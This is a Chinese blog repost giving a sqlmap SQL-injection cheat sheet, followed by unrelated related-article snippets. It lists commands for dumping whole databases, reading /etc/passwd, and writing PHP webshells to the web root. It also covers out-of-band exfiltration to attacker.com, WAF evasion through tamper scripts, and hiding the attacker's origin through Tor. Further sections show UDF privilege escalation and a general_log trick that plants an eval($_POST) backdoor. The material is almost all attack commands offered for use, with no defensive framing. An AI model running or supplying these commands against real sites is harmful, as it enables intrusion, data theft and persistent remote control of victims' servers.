sqlmap一把梭

news/2026/1/17 13:02:47/文章来源:https://www.cnblogs.com/paaai/p/19495771

一、注入扩大

1. 确认注入点

sqlmap -u "http://target.com/page?id=1" --batch --current-user --is-dba

(https请求记得加--force-ssl)

2. 扩大危害

目标 命令
爆库 --dbs
爆表 -D dbname --tables
爆列 -D dbname -T tab --columns
拖数据 -D dbname -T tab -C col1,col2 --dump --threads 10
读文件 --file-read="/etc/passwd"
写文件 --file-write=shell.php --file-dest=/var/www/html/shell.php
命令执行(--os-shell) --os-shell
带外回显 --dns-domain=attacker.com
交互式 SQL 终端 --sql-shell

一键梭哈

python sqlmap.py -u "http://target.com/page?id=1"--dbs --dump-all --threads 10--tamper=space2comment,charencode--random-agent --delay=0.5 --batch

3. 已知信息 → 节省时间,精准注入

已知项 对应参数 示例、解释
数据库类型 --dbms=mysql / --dbms=mssql / --dbms=postgresql 直接跳过指纹阶段
注入技术 --technique=U (Union) / E (Error) / B (Boolean) / T (Time) / S (Stacked) 组合:--technique=UET
注入点 -p id* 标记 -u "https://x.com?id=1*" -p id
POST 参数 -r req.txt --data="id=1" -p id 同用
Cookie 注入 --cookie="uid=9*" 星号或 -p uid
跳过探测 --skip-waf --skip-heuristics --threads 10 省指纹、省 WAF 测试
指定库/表/列 -D targetdb -T users -C id,pass 只拉目标数据
payload 数量增多 --level 0-5 --level 5 把“能测的都测”
payload 风险增加 --risk 0-3 --risk 3 把“敢用的都用”

一键梭哈

python sqlmap.py -u "https://vuln.com/page?id=1*"--dbms=mysql--technique=U-p id--skip-waf --skip-heuristics-D targetdb -T users -C id,pass --dump--threads 10 --batch

二、检测并绕过 WAF

1. WAF 检测

功能 命令
自动识别 WAF 类型 sqlmap -u "http://target.com?id=1" --identify-waf

2. 绕过方式速览

绕过策略 命令 说明
编码绕过 --tamper=charencode,apostrophemask,percent URL/Unicode/十六进制编码混淆
空格绕过 --tamper=space2comment,space2plus 用/**/或+代替空格
参数污染 --param-del="&" -u "http://target.com?id=1&id=2" 同名参数多次提交
分块传输 --chunked 绕过基于 Content-Length 的检测
延迟盲注 --time-sec=10 --technique=T 延长时间避免触发阈值
伪流量混淆 --null-connection --invalid-bignum 仅测长度/大整数绕过数字型WAF
代理/匿名 --proxy=socks5://127.0.0.1:1080 --tor 通过代理池或 Tor 隐藏真实来源
随机化请求 --random-agent --delay=0.5 随机 UA 与间隔,降低检测概率

一键梭哈

sqlmap -u "http://target.com?id=1"--identify-waf--level 5 --risk 3--tamper=charencode,space2comment,apostrophemask--chunked --random-agent --time-sec=10 --delay=1

三、sqlmap --os-shell 原理 & 替代方案速查

--os-shell 原理

1.写入两个 PHP 文件

  • 第 1 个:tmp****.php 负责 文件上传
  • 第 2 个:tmp****.php 负责 命令执行
    sqlmap 通过 INTO OUTFILE/DUMPFILE 把这两个脚本写到 Web 目录,再访问它们实现交互 Shell。

2.数据库差异

数据库 实现方式
MySQL INTO OUTFILE + UDF(sys_eval
SQL Server 启用 xp_cmdshell 存储过程
PostgreSQL COPYpg_largeobject

3.前置条件(缺一不可)

  • DBA 权限:--is-dba 必须为 True
  • 已知网站绝对路径
  • secure_file_priv=""(MySQL 允许任意目录写入)
  • Web 目录具有写权限且 PHP GPC=off(不自动转义单引号)

如果 --os-shell 失败

替代思路 命令/方法 适用场景
UDF 提权 手动上传 udf.dllCREATE FUNCTION sys_eval …SELECT sys_eval('cmd') MySQL root 但无 Web 写权限
日志写 WebShell set global general_log=on; set global general_log_file='/var/www/html/shell.php'; SELECT '<?php eval($_POST[x]);?>'; 无法 OUTFILE 但能修改日志路径
--file-write sqlmap --file-write=shell.php --file-dest=/var/www/html/shell.php 已知绝对路径且有写权限
后台拿 Shell --dump 爆管理账号 → 扫后台 → 登录后上传 Webshell SQL 注入无写权限但存在后台
--sql-shell 交互式 SQL 终端,手动构造 SELECT ... INTO OUTFILE 需要精细控制写入内容

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1173513.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

这 10 个 Vue3 性能优化技巧很实用,但很多项目都没用上

🧑‍💻 写在开头 点赞 + 收藏 === 学会🤣🤣🤣今天来分享 10 个 Vue3 的性能优化技巧。核心原则: 减少不必要的响应式追踪 避免无谓的 DOM 操作 按需加载资源咱也不要为了优化而优化!小项目用默认写法完全没…

2026年智慧校园专项资金申报政策解析:重点支持哪些方向?

✅作者简介&#xff1a;合肥自友科技 &#x1f4cc;核心产品&#xff1a;智慧校园平台(包括教工管理、学工管理、教务管理、考务管理、后勤管理、德育管理、资产管理、公寓管理、实习管理、就业管理、离校管理、科研平台、档案管理、学生平台等26个子平台) 。公司所有人员均有多…

国产化替代中,百度富文本编辑器支持哪些格式的截图粘贴?

企业网站后台管理系统富文本编辑器Word集成解决方案评估与实施报告 项目负责人&#xff1a;XXX 日期&#xff1a;2023-XX-XX 一、需求背景分析 当前集团企业网站后台管理系统存在以下核心需求&#xff1a; 需要实现Word内容完美粘贴&#xff08;保留所有样式和特殊元素&…

桌面大爷学Web(2)-AI SOLO模式实战:只动嘴不动手从零构建Vue地图页面

文章目录一、前言二、 项目背景三、交互开发流程第一次任务&#xff1a;项目初始化第二次任务&#xff1a;地图交互功能第三次任务&#xff1a;模式选择与量测功能第四次任务&#xff1a;数据库查询功能第五次任务&#xff1a;地名搜索功能最终任务 应用代码重构和添加注释重构…

【图像加密解密】基于matlab DNA编码混沌系统图像加密解密(数据丢失攻击测试、直方图分析、熵值计算、PSNR 峰值信噪比、像素相关性分析)【含Matlab源码 14961期】

&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;欢迎来到海神之光博客之家&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49…

【图像加密解密】傅立叶变换和相位掩膜带相位掩模的图像加密解密【含Matlab源码 14963期】

&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;Matlab领域博客之家&#x1f49e;&…

Maven教程(Maven简介之构建工具)

1.1 依赖管理工具 管理规模庞大的 jar 包,需要专门工具 示例依赖:opentest4j-1.2.0.jar、mysql-connector-java、web.xml 1.2 构建工具 脱离 IDE 环境仍需构建:在服务器环境中必须通过命令行进行项目构建 支持版本控…

【图像加密解密】基于matlab分数阶傅立叶变换和曲线锯变换图像加密解密【含Matlab源码 14962期】

&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49e;欢迎来到海神之光博客之家&#x1f49e;&#x1f49e;&#x1f49e;&#x1f49…

05谓词逻辑等值演算及推理

05谓词逻辑等值演算及推理

t检验(T test),亦称Student‘s t检验,是统计学中常用的一种假设检验方法,广泛应用于定量资料的两组均数比较

下面内容摘录自《用R探索医药数据科学》专栏文章的部分内容&#xff08;原文5422字&#xff09;。 2篇3章6节&#xff1a;R中进行独立样本的t检验_r 独立样本t检验-CSDN博客 t检验&#xff08;T test&#xff09;&#xff0c;亦称Students t检验&#xff0c;是统计学中常用的一…

2026年目前比较好的智能仓库供应厂家推荐排行,全自动仓库/智能仓库/自动化立体仓库/立体仓储,智能仓库加工厂推荐榜单 - 品牌推荐师

随着制造业数字化转型加速,智能仓库已成为企业降本增效的核心基础设施。据第三方机构统计,2025年国内智能仓储市场规模突破800亿元,年复合增长率超18%。然而,市场碎片化特征显著,超60%企业面临供应商选择困难——…

看似 “捡漏” 的诱饵:地产经纪人的对比效应策略

为什么地产经纪人常常带客户看两栋差不多完全一样的房子&#xff0c;但其中一栋却比另一栋既便宜、环境又好&#xff1f;看似 “捡漏” 的诱饵&#xff1a;地产经纪人的对比效应策略地产经纪人带客户看 “差不多但更划算” 的房子&#xff0c;本质是利用行为经济学中的对比效应…

跨平台网页应用如何用vue实现文件夹上传?

前端老炮的20G文件夹上传大冒险&#xff08;附部分代码&#xff09; 各位前端同仁们&#xff0c;我是老张&#xff0c;一个在辽宁苦哈哈写代码的"前端民工"。最近接了个活&#xff0c;客户要求用原生JS实现20G文件夹上传下载&#xff0c;还要支持IE9&#xff01;这简…

【技术内幕】为什么你写的 Python 翻译脚本总是不好用?揭秘工业级 AI 图片翻译的“四步流水线”

Python 系统架构 计算机视觉 OCR AIGC 跨境电商摘要在跨境电商的自动化浪潮中&#xff0c;图片翻译&#xff08;Image Translation&#xff09; 是需求最旺盛的场景。许多开发者试图通过拼接开源库&#xff08;如 pytesseract, googletrans, Pillow&#xff09;来实现这一功能&…

ALLEGRO怎么给铜皮倒角

如果你想其中一个倒角

军工企业网页项目怎么实现文件夹上传功能?

大文件传输系统技术方案设计与实现&#xff08;第一人称专业报告&#xff09; 一、项目背景与需求分析 作为广西某软件公司前端工程师&#xff0c;近期负责一个关键项目的大文件传输模块开发。该项目需求具有以下特点&#xff1a; 支持20GB级大文件传输&#xff08;上传/下载…

【Python自动化】手机壳/T恤卖家的福音:如何用“主从克隆”技术瞬间搞定 100 个 SKU 变体的图片翻译?

Python 多变体运营 SKU管理 图像合成 跨境电商摘要在跨境电商&#xff08;如 Amazon Merch, Etsy, Casetify 模式&#xff09;中&#xff0c;多变体&#xff08;Multi-Variant&#xff09; 产品是管理的噩梦。一款手机壳可能有 50 种花色&#xff0c;一款 T 恤可能有 20 种底色…

2026年服务好的专卖店施工公司电话大盘点,靠谱企业全揭秘 - 工业品牌热点

在消费升级与品牌体验经济的浪潮下,专卖店作为品牌与消费者直接对话的线下橱窗,其空间设计与施工品质直接决定了品牌形象的传递效率与用户转化效果。面对市场上良莠不齐的专卖店施工与设计服务,如何找到既懂品牌调性…

《P1850 [NOIP 2016 提高组] 换教室》

题目背景NOIP2016 提高组 D1T3题目描述对于刚上大学的牛牛来说&#xff0c;他面临的第一个问题是如何根据实际情况申请合适的课程。在可以选择的课程中&#xff0c;有 2n 节课程安排在 n 个时间段上。在第 i&#xff08;1≤i≤n&#xff09;个时间段上&#xff0c;两节内容相同…